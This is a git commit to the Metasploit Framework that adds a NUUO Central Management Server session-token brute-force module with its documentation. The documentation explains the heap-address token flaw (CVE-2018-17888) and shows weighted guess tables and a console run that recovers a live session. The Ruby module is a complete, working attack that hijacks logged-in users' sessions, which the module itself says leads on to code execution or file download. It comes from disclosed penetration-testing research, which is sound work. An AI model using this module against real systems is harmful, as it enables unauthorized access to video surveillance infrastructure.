Land #11291, Add Nuuo CMS session bruteforcing module

2019-02-20 09:13:33 -06:00 · 2019-02-20 09:13:33 -06:00 · c179e5cdad
parent 3a346fbb98 49307ae6c7
commit c179e5cdad
2 changed files with 231 additions and 0 deletions
--- a/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md
+++ b/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md
@ -0,0 +1,81 @@
+## Description
+
+Nuuo CMS Session Bruteforce
+
+The NUUO CMS protocol uses session tokens in a similar way to HTTP cookies. As mentioned in the summary, if a USERLOGIN request is sent with a correct username and password, a "User-Session-No" token will be returned. The number returned is composed of 8 digits, so if an attacker wanted to guess it, they would have 10 million possibilities, and would be able to bruteforce it on average after 5 million tries.
+
+The function responsible for creating a new user is at offset 0x454E80 in CMS_Server.exe version 2.1. It sets up a new user object and returns the session token to the calling function. This function has what is probably a coding error - the number returned is actually not a number, but the heap address of the user object created by invoking "new()" in the user object class. An assembly snippet is shown below:
+
+```
+.text:00454E80 000                 push    0FFFFFFFFh
+.text:00454E82 004                 push    offset loc_5E2013
+.text:00454E87 008                 mov     eax, large fs:0
+.text:00454E8D 008                 push    eax
+.text:00454E8E 00C                 sub     esp, 8    
+.text:00454E91 014                 push    ebp
+.text:00454E92 018                 push    esi
+.text:00454E93 01C                 push    edi
+.text:00454E94 020                 mov     eax, dword_68D134
+.text:00454E99 020                 xor     eax, esp   
+.text:00454E9B 020                 push    eax
+.text:00454E9C 024                 lea     eax, [esp+24h+var_C]
+.text:00454EA0 024                 mov     large fs:0, eax
+.text:00454EA6 024                 mov     ebp, ecx
+.text:00454EA8 024                 lea     edi, [ebp+43Ch] 
+.text:00454EAE 024                 push    edi             ; lpCriticalSection_EnterCriticalSection
+.text:00454EAF 028                 mov     [esp+28h+var_10], edi
+.text:00454EB3 028                 call    ds:EnterCriticalSection
+.text:00454EB9 024                 push    1B8h            ; unsigned int
+.text:00454EBE 028                 mov     [esp+28h+var_4], 0
+.text:00454EC6 028                 call    ??2@YAPAXI@Z    ; new() operator, returns object in eax
+(...)
+```
+
+After the call to ??2@YAPAXI@Z in .text:00454EC6, the session number is returned to the calling function (sub_457100), which then stores it and sends it back to the client as the valid session number:
+
+```
+NUCM/1.0 200 OK
+User-Valid: %d
+Server-Version: %s
+Ini-Version: %d
+License-Number: %d
+User-Session-No: %u <---- session number, which is a hexadecimal memory address converted to decimal
+```
+
+These session numbers (tokens) are not that easy to predict, however after collecting thousands of samples I was able to build a table of the most common occurrences, which reduces the possibilities from 10 million to about 1.2 million. In practice, the tokens can usually be guessed between in less than 500,000 attempts - an improvement of 95% over standard bruteforcing. It is likely this can be further improved with some deeper analysis, but due to time constraints this was not investigated further. The tables used to do the bruteforcing are in Appendix #C.
+
+This attack is perfectly feasible despite the high number of attempts needed. Firstly, there is no bruteforce protection on the CMS server, so we can just flood it with requests and find the session number in less than an hour. 
+Secondly, due to the nature of this application, it is normal to have the software clients logged in for a long amount of time (days, weeks) in order to monitor the video cameras controlled by CMS.
+
+It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.0 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server v2.1.0
+
+```
+msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
+
+[*] 172.22.222.200:5180 - Bruteforcing session - this might take a while, go get some coffee!
+[*] 172.22.222.200:5180 - Generating 2621440 session tokens
+[+] 172.22.222.200:5180 - Found valid user session: 42094216
+[*] 172.22.222.200:5180 - Time taken: 1384.588721601991 seconds; total tries 590893
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/nuuo_cms_bruteforce) >
+```
+
+## References
+
+https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
--- a/modules/auxiliary/gather/nuuo_cms_bruteforce.rb
+++ b/modules/auxiliary/gather/nuuo_cms_bruteforce.rb
@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'benchmark'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Nuuo
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Nuuo Central Management Server User Session Token Bruteforce',
+      'Description'    => %q{
+        Nuuo Central Management Server below version 2.4 has a flaw where it sends the
+        heap address of the user object instead of a real session number when a user logs
+        in. This can be used to reduce the keyspace for the session number from 10 million
+        to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries.
+        This module does exactly that - it uses a computed occurence table to try the most common
+        combinations up to 1.2 million to try to guess a valid user session.
+        This session number can then be used to achieve code execution or download files - see
+        the other Nuuo CMS auxiliary and exploit modules.
+        Note that for this to work a user has to be logged into the system.
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2018-17888' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
+
+        ],
+      'Platform'       => ['win'],
+      'DisclosureDate'  => 'Oct 11 2018'))
+    deregister_options('SESSION', 'USERNAME', 'PASSWORD')
+  end
+
+  # These tables were generated by doing thousands of requests to a NUUO CMS Server and collecting the  responses.
+  # Table id: hex-nu-mod
+
+  # 2621440 total combinations for both 1.X and 2.X versions
+  # 2.X versions only have 1048576 combinations, and this table will run through them first
+  WEIGHTED_ARRAY_7 =
+    ['2', '1'],
+    ['4', '6', '5', '7', '8', '2', '0', '1', 'f', 'e'],
+    ['1', '6', '0', '8', 'd', '7', 'c', 'e', '2', 'b', 'f', '3', '5', '4', 'a', '9'],
+    ['d', '6', '4', '5', 'f', '0', '8', '7', 'a', '3', '1', 'b', 'c', 'e', '9', '2'],
+    ['3', 'e', 'f', '1', 'c', '5', '9', 'd', '8', '6', '0', '4', 'a', '2', 'b', '7'],
+    ['d', '4', '2', 'b', '3', '6', '8', '1', 'a', '7', 'f', 'e', '0', '9', '5', 'c'],
+    ['8', '0']
+
+  # 189000 total combinations
+  # Only tested (only applies?) to 2.X versions
+  # These are only tried if WEIGHTED_ARRAY_7 fails
+  WEIGHTED_ARRAY_6 =
+    ['9', 'a'],
+    ['7', 'c', '6', 'f', 'e', 'a', 'd', '9', '4', '5', '3', '2', 'b', '0', '8'],
+    ['7', 'b', '6', 'd', 'a', '3', '4', 'f', '5', '1', '8', 'e', 'c', '2'],
+    ['3', '1', 'c', 'f', 'd', '4', 'b', 'a', '6', '2', '5', 'e', '8', '9', '0'],
+    ['3', '6', '7', 'b', 'e', '9', '2', 'f', '4', '1', 'c', 'a', '0', 'd', '8'],
+    ['0', '8']
+
+
+  def session_number_list(weighted_array)
+    # Let's calculate all the possible combinations
+    length = Array.new(weighted_array.length)
+    for i in (0..weighted_array.length-1)
+      length[i] = weighted_array[i].length
+    end
+    counter = Array.new(weighted_array.length)
+    for i in (0..weighted_array.length-1)
+      counter[i] = 0
+    end
+    total = 1
+    for len in length
+      total *= len.to_i
+    end
+
+    print_status("Generating #{total} session tokens")
+    final_list = Array.new
+
+    # code below taken from https://gist.github.com/Yengas/9010715
+    (total).times {
+      if weighted_array.length == 6
+        final_list << weighted_array[0][counter[0]] + weighted_array[1][counter[1]] + weighted_array[2][counter[2]] + weighted_array[3][counter[3]] + weighted_array[4][counter[4]] + weighted_array[5][counter[5]]
+      elsif weighted_array.length == 7
+        final_list << weighted_array[0][counter[0]] + weighted_array[1][counter[1]] + weighted_array[2][counter[2]] + weighted_array[3][counter[3]] + weighted_array[4][counter[4]] + weighted_array[5][counter[5]] + weighted_array[6][counter[6]]
+      else
+        # assume size == 8
+        final_list << weighted_array[0][counter[0]] + weighted_array[1][counter[1]] + weighted_array[2][counter[2]] + weighted_array[3][counter[3]] + weighted_array[4][counter[4]] + weighted_array[5][counter[5]] + weighted_array[6][counter[6]] + weighted_array[7][counter[7]]
+      end
+
+      # Find value of current combination by concatenating corresponding values of counters in the inner-arrays
+      # Then we increment the value of the counter so we go on to the next combination.
+      for index in (counter.length - 1).downto(0) # From (counter array's length - 1) to 0
+        if counter[index] + 1 < length[index] then # If counter index can be incremented
+            counter[index] += 1; # Increment the counter index
+            break; # Stop the incrementation/go to the next combination printing/incrementing.
+        end
+        counter[index] = 0; # Assign current counter index to zero and try incrementing the next counter index.
+      end
+    }
+
+    full_list = Array.new
+    final_list.each { |x|
+      full_list << x.to_i(16)
+    }
+
+    return full_list
+  end
+
+  def session_bruteforce_list(weighted_array)
+    list = session_number_list(weighted_array)
+    for session in list
+      @nucs_session = session
+      data = nucs_send_msg(['PING'])
+      @counter += 1
+      if data[0] =~ /OK/ || data[0] =~ /612/
+        return session
+      end
+    end
+    return nil
+  end
+
+  def run
+    @counter = 0
+    print_status('Bruteforcing session - this might take a while, go get some coffee!')
+    session = nil
+    time = Benchmark.realtime {
+      session = session_bruteforce_list(WEIGHTED_ARRAY_7)
+      unless session
+        print_error('Failed to bruteforce, trying with the less likely numbers as a last resort...')
+        session = session_bruteforce_list(WEIGHTED_ARRAY_6)
+      end
+    }
+    unless session
+      fail_with(Failure::Unknown, 'Failed to bruteforce user session.')
+    else
+      print_good("Found valid user session: #{session}")
+      print_status("Time taken: #{time} seconds; total tries #{@counter}")
+    end
+  end
+end